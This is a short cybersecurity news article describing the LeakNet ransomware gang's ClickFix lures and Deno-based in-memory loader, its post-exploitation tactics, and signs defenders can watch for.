Uncovering the Tactics of LeakNet Ransomware: ClickFix and Deno Runtime Exploits Revealed

The Rise of LeakNet Ransomware: ClickFix Technique and Deno Runtime

In the realm of cyber threats, the LeakNet ransomware gang has adopted a stealthy approach using the ClickFix technique for infiltrating corporate networks. This sophisticated group now leverages a malware loader built on the open-source Deno runtime, designed for JavaScript and TypeScript.

By utilizing the ClickFix method, attackers trick unsuspecting users into unwittingly executing malicious commands on their systems through deceptive prompts. This technique, commonly employed by various ransomware groups like Termite and Interlock, has now found its way into LeakNet’s arsenal.

LeakNet’s implementation of ClickFix leads to the deployment of a Deno-based loader, enabling the execution of a JavaScript payload directly in system memory. This strategic move minimizes forensic evidence stored on disk, thereby reducing the likelihood of detection.

The Evolution of LeakNet

LeakNet emerged as a ransomware threat actor in late 2024, targeting an average of three victims per month. With the adoption of these new tactics, their operation may expand, posing a greater threat to organizations.

The “Bring Your Own Runtime” Attack

Described as a “bring your own runtime” (BYOR) attack by cybersecurity experts at ReliaQuest, LeakNet’s use of Deno represents a unique strategy. Deno, a legitimate JavaScript/TypeScript runtime, allows for code execution outside the browser on a system. This approach bypasses blocklists and filters designed to prevent unknown binary execution, making it a challenging threat to detect.

Instead of deploying a custom malware loader that could raise red flags, LeakNet leverages the legitimate Deno executable to run malicious code. The attackers initiate this process through Visual Basic Script (VBS) and PowerShell scripts, cleverly named Romeo*.ps1 and Juliet*.vbs.

The use of Deno for direct in-memory execution is crucial, as it leaves minimal forensic artifacts behind, resembling a routine developer task rather than a malicious activity.

Post-Exploitation Tactics

Following the execution of the code, LeakNet engages in various post-exploitation techniques, including DLL sideloading, C2 beaconing, credential discovery, lateral movement via PsExec, and payload staging. These tactics involve sophisticated methods like data exfiltration through abusing Amazon S3 buckets.

The researchers emphasize that the consistent and repeatable nature of LeakNet’s attack chain provides valuable detection opportunities for defenders. Signs of potential LeakNet activity include Deno running outside development environments, suspicious browser executions, abnormal PsExec usage, unexpected outbound traffic to S3, and DLL sideloading in atypical directories.